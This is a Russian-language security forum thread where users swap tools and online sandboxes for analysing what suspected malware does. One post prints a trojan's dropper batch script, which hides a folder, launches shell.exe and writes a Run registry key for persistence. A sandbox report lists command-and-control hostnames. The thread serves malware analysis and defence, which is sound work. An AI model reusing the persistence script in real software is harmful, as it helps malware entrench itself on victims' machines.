как узнать что делает вирус

Мне частенько приходится встречатся с новыми модификациями вирусов, которые вылавливаются собственными руками ,
по принципу подозрительного месту расположения, атрибутов, типу запуска и т. д.
хотелось бы узнать как проверить-узнать
каким образом работает этот зловред -
тоесть к каким ip обращается, что отсылает .
какие службы запускает, где и что в реестре пишет, какие папки создает, какие службы запускает, блокирует ,использует?
Посоветуйте каким софтом для этого пользоваться





p.s.
вот к примеру нашел вчера вот это [URL]https://www.virustotal.com/file/4544eba5357ef6c6eee6d79614aa8892dacdb25e04fe66e4e655f16189fb529b/analysis/1341173867/[/URL]
и это точно троян или просто его часть

[LIST][*][url]http://threatexpert.com[/url][*][*][url]http://camas.comodo.com/[/url][/LIST]

с этим •[url]http://camas.comodo.com/[/url] понятно
а что здесь •[url]http://threatexpert.com[/url] мельком взглянув вроде как пограммы для моих задач
к стати ThreatExpert Submission Applet в win7x64 некорректно запустился не могу отправить фаил


а есть ли софт что бы проверять все локально и без наличия интернета

[quote="visokosnik;899131"]а есть ли софт что бы проверять все локально и без наличия интернета[/quote]Есть песочницы, например [url]http://www.sandboxie.com/[/url]

[quote="visokosnik;899131"]к стати ThreatExpert Submission Applet в win7x64 некорректно запустился не могу отправить фаил[/quote]
[url]http://www.threatexpert.com/submit.aspx[/url] - на этой странице можно отправить файлы без апплетов.

Ещё он-лайн вариант: [url]http://www.norman.com/security_center/security_tools/[/url]

Пробуйте.

очень понравилась работа [url]http://camas.comodo.com/[/url]
а есть ли еще ему подобные сервисы

Мне тоже из всех он-лайн анализаторов нравится COMODO. Все сервисы, ссылки на которые я здесь привёл выполняют аналогичные функции - анализ поведения.

[quote="visokosnik;899125"]вот к примеру нашел вчера[/quote]Детект 2/42 не есть гарантия наличия вируса :)

Когда-то для тестовых целей я делал просто. Ставил программу для контроля файловой системы, Adinf и аналог + программу для контроля изменений реестра. Далее делаешь снепшот, запускаешь вредоноса и смотришь куда он прописался и что где раскидал :)

Есть решений 2 в 1 - это Total Unstaller [url]http://www.martau.com/[/url] Конечно авторы проги делали ее для другого :) Программ платная, но все сделано удобно.

[size="1"][color="#666686"][B][I]Добавлено через 41 секунду[/I][/B][/color][/size]

Но в реалтайме так конечно не отследишь, что вредонос делает.

[QUOTE=thyrex;899246]Детект 2/42 не есть гарантия наличия вируса :)[/QUOTE]

согласен ,НО!!!
не раз бывало такое что сегодня 0 из 42
завтра 5 из42
а через неделю 37 из 42

[COLOR="silver"]- - - Добавлено - - -[/COLOR]

подскажите а как в комоду отправить фаил shell.exe который запускается батником
[CODE]@echo off
set ztmp=C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\ztmp
set MYFILES=C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\afolder
set bfcec=t18807.exe
attrib +h C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\ztmp
@echo off
copy shell.exe %temp%\afolder
%temp%\afolder\shell.exe -2
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "shell" /d "%temp%\afolder\shell.exe -2" /t REG_SZ /f >nul
attrib +h %temp%\afolder[/CODE]
то есть если shell.exe запускать без параметров, он ни каких действий делать не будет, а
с такими параметрами shell.exe -2
покажет себя во всей красе


P.S.хитрый троянчик

[QUOTE]не раз бывало такое что сегодня 0 из 42
завтра 5 из42
а через неделю 37 из 42[/QUOTE]

Бывает так, но бывает и иначе. Что послезавтра становится 7-10 и дальше не наращивается кол-во.

Все дело в том, что куча вендоров тупо паразитируют на коллегах. Смотрят на конкурентов и добавляют автоматом детект себе. Увы, таких компаний много. Поэтому не нужно ориентировать на массу. ИМХО [B]правильнее смотреть на выборку из 7-10 наиболее авторитетных вендора, которые сами проводят анализ и имеют свои базы знаний[/B] (включая облачные).

именно поэтому я открыл эту тему
что бы самому по действиям файла ,убедится есть ли в нем зловредный код , а не тупо смотреть на результаты virustotal
вот к примеру последний из пойманных
[CODE]

#

Filename(s)

File Size

File MD5

Alias / Other Info



1

%Temp%\afolder\shell.exe

11,781 bytes

0x70B23E4AD55DE99EBB65720A436069F8

Trojan.Win32.Swrort [Ikarus]



2

[file and pathname of the sample #1]

69,504 bytes

0xFE90B0F3A569B2DB346DFB620D4E5674

Win32.SuspectCrc [Ikarus]


The following directories were created:
%Temp%\afolder
%Temp%\ztmp







Memory Modifications

There were new processes created in the system:




Process Name

Process Filename

Main Module Size



shell.exe

%Temp%\afolder\shell.exe

28,672 bytes



[filename of the sample #1]

[file and pathname of the sample #1]

10,371,072 bytes

Registry Modifications

The newly created Registry Value is:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
shell = "%Temp%\afolder\shell.exe -2"

so that shell.exe runs every time Windows starts

Other details

To mark the presence in the system, the following Mutex object was created:
)!VoqA.I4
The following Host Names were requested from a host database:
fad.no-ip.info
sudo.no-ip.info
ser.no-ip.info
brutal.no-ip.info
There was a registered attempt to establish connection with the remote host. The connection details are:

Remote Host

Port Number

fad.no-ip.info

443
Outbound traffic

There was an outbound traffic produced on port 443:

00000000 | E570 6780 DE78 F14E 89C7 3DA4 3AA9 4333 | .pg..x.N..=.:.C3
00000010 | AECF 0415 A67F AE05 C4C0 2270 64E5 6A3E | .........."pd.j>
00000020 | 559E 8160 8D5E 9BB3 6712 726E 721F 1677 | U..`.^..g.rnr..w
00000030 | 57F1 C6F0 E209 EFBD 9BD4 972C 9CB3 4753 | W..........,..GS
00000040 | E1D0 2E6A 92EF 5A4D 61D3 C03C 7E66 BAE5 | ...j..ZMa..<~f..
00000050 | 65E6 D851 4581 6B89 519A 4EC6 61F3 EFB6 | e..QE.k.Q.N.a...
00000060 | D8E6 71DB EDE6 C172 3A9D C1CB CE6B 6DA4 | ..q....r:....km.
00000070 | BA61 39E1 689A 95A4 6077 0FFF 7A3E 6821 | .a9.h...`w..z>h!
00000080 | 072C BD41 6085 93A8 623F BF45 D6D7 C3B3 | .,.A`...b?.E....
00000090 | DB0C F51E CFF2 7BA6 7BDA E715 877B 31BA | ......{.{....{1.
000000A0 | 70D8 5EAB 7B67 FC57 55CE 8C24 5D9E F9B8 | p.^.{g.WU..$]...
000000B0 | E897 7A06 685A AD6E 1DE4 5CBA 7123 8156 | ..z.hZ.n..\.q#.V
000000C0 | 04D8 2F87 78C6 1286 F615 D3B3 D6C8 1A86 | ../.x...........
000000D0 | 9358 C19F 0D12 C7DC E033 0FE0 29CE E978 | .X.......3..)..x
000000E0 | 6A72 33B4 4F3F 83F1 BE8A C725 0AB6 AE4C | jr3.O?.....%...L
000000F0 | D9D2 1FCD 7C36 3595 304B 1EFE 20D8 6332 | ....|65.0K.. .c2
[/CODE]


хотя на вирустотале [url]https://www.virustotal.com/file/db295407325cb5f1e14a4414d7c9abd8ee1d2fce1e02e577b1cf5a90e70007c6/analysis/[/url]
промолчали самые известные
avira
avast
avg
DrWeb
Kaspersky
NOD32
и тд

а вот результаты комоды
[url]http://camas.comodo.com/cgi-bin/submit?file=db295407325cb5f1e14a4414d7c9abd8ee1d2fce1e02e577b1cf5a90e70007c6[/url]

вот так ведь сразу видно что это бекдор

[quote="Ilya Shabanov;899288"]Когда-то для тестовых целей я делал просто. Ставил программу для контроля файловой системы, Adinf и аналог + программу для контроля изменений реестра. Далее делаешь снепшот, запускаешь вредоноса и смотришь куда он прописался и что где раскидал[/quote]

утилиты от Матусека здорово помогают в этом деле.

[QUOTE=PavelA;899493]утилиты от Матусека здорово помогают в этом деле.[/QUOTE]
а кто токой Матусека? можно поподробней

[quote="visokosnik;899503"]а кто токой Матусека? можно поподробней[/quote]
Не кто, а что. :)

[URL="http://www.matousec.com/"][B]matousec.com[/B][/URL]

Я немного ошибся и имел, конечно, в виду другую известную личность: Марка Русиновича, ныне сотрудника МС. Его блог, кстати есть на русском, содержит много информации по изучению различных программ.

Слушал тренинг Марка, где он показывал как при помощи только его утилит SysInternals можно обнаружить подозрительные процессы и удалить их. Никаких других средств он не использовал при этом.

Здравствуйте.
Только что мне один человек сбросил файл под видом песни, но с разрешением *.exe, прогнал его через Comodo и вот результат [url]http://camas.comodo.com/cgi-bin/submit?file=2bdba9f7fd14c4d0711e2dccc0a8d22ec4c0a0b4cdb705135a47f8627fca443f[/url]

Я не спец, но хотелось бы узнать, что эти результаты тестов говорят? Расшифруйте, пожалуйста.

З.Ы.
"Keys Created
• Keys Changed
• Keys Deleted"
Это значит создание, изменение и удаление паролей?

[quote="Владимир Клименко;1125299"]Это значит создание, изменение и удаление паролей?[/quote]
Нет, это означает создание, изменение или удаление ключей [URL="http://ru.wikipedia.org/wiki/%D0%A0%D0%B5%D0%B5%D1%81%D1%82%D1%80_Windows"]системного реестра[/URL].
Из этого отчёта видно, что программа осуществляет HTTP запрос на определённый сайт (указан в таблице).

Если вас интересуют подробности о данной вредоносной программы, вы можете прислать её нам и получить ответ в [URL="http://virusinfo.info/showthread.php?t=37678"]соответствующей теме[/URL].